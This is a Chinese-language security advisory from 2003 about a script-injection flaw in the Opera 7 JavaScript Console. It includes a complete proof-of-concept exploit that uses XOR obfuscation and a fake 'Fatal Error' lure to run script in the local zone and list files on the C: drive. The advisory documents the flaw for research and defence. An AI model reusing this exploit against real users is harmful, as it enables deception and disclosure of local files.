安全研究
安全漏洞
Opera JavaScript Console单引号属性注入漏洞
发布日期:2003-04-28
更新日期:2003-05-09
受影响系统:
Opera Software Opera Web Browser 7.10描述:
Opera Software Opera Web Browser 7.03 win32
Opera Software Opera Web Browser 7.02 win32
Opera Software Opera Web Browser 7.01 win32
BUGTRAQ ID: 7449
Opera是一款多平台的WEB浏览器。
Opera JavaScript Console存在问题,远程攻击者可以利用这个漏洞以本地区域权限在系统上执行任意Javascript命令,造成信息泄露。
Opera的"JavaScript Console"用于显示Javascript的错误消息,允许在链接中注入任意脚本。当用户打开由JavaScript Console产生的错误消息页面时,包含的恶意脚本将在用户浏览器上执行。
漏洞主要是因为Opera 7的console.html没有充分过滤单引号,允许注如任意脚本到链接中,虽然部分Opera版本对"'"和"'"号进行了过滤,但是对类似用"'"代替"'"却没有过滤,会把"'"解析成"'"注入到链接中。构建恶意链接,并诱使用户访问,可导致恶意脚本代码在本地安全域下执行。
<*来源:nesumin (nesumin@softhome.net)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105154500727380&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1,把如下"Xploit"用"script"代替,并保存为html文件。
2,上传到WEB服务器。
3,打开Opera(启用Javascript)。
4,在Javascript console上点链接。
----------------------------------------------------------------
<Xploit>
var depth = 1;
var startdir = "file://localhost/c:/";
// arbitrary script
var evil_script="";
evil_script += "function dt(dp){\n";
evil_script += "var i,j,tr,td,b;\n";
evil_script += "if('complete'==fr.document.readyState&&";
evil_script += "fr.document.getElementsByTagName('base').item(0)){\n";
evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='<hr>\\n'";
evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";
evil_script += "b+='<br>\\n'+'Count : '+tr.length+'<br>\\n';\n";
evil_script += "for(i=1;i<tr.length;++i){\n";
evil_script += "td = tr.item(i).getElementsByTagName('td');\n";
evil_script += "if (td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";
evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";
evil_script += ".item(0).src.match(/\\\\folder\\.gif$/))\n";
evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";
evil_script += "for (j=0;j<4;++j)b+=td.item(j).innerText+' ';";
evil_script += "b+='<br>\\n';}tree.innerHTML+=b;\n";
evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;}\n";
evil_script += "setTimeout('dt('+dp+');',30);}\nvar ds = new Array(),";
evil_script += "b = document.getElementsByTagName('body').item(0),";
evil_script += "f = document.createElement('iframe'),";
evil_script += "d = document.createElement('div');\n";
evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";
evil_script += "f.style.width=f.style.height=f.style.border=0;\n";
evil_script += "f.setAttribute('src','"+startdir+"');\n";
evil_script += "f.setAttribute('id','fr');\n";
evil_script += "b.appendChild(f);\n";
evil_script += "dt("+depth+");\n";
// xor and URLEncode
evil_script = escape(evil_script.replace(/./g,function(s){
return(String.fromCharCode(0x80^s.charCodeAt(0)))}));
var msg = "http://";
// fake url
msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";
// code
msg += "');m='";
msg += evil_script;
msg += "';eval(unescape(m).replace(/./g,function(s){";
msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))})+'\n";
// fake message
msg += "\n";
msg += "Fatal Error !!!!\n\n";
msg += " Please click above link.\n"; // :p
opera.postError(msg);
//window.open("file://localhost/console.html","","");
location.href = "file://localhost/console.html";
</Xploit>
----------------------------------------------------------------
建议:
厂商补丁:
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com
浏览次数:3060
严重程度:0(网友投票)
绿盟科技给您安全的保障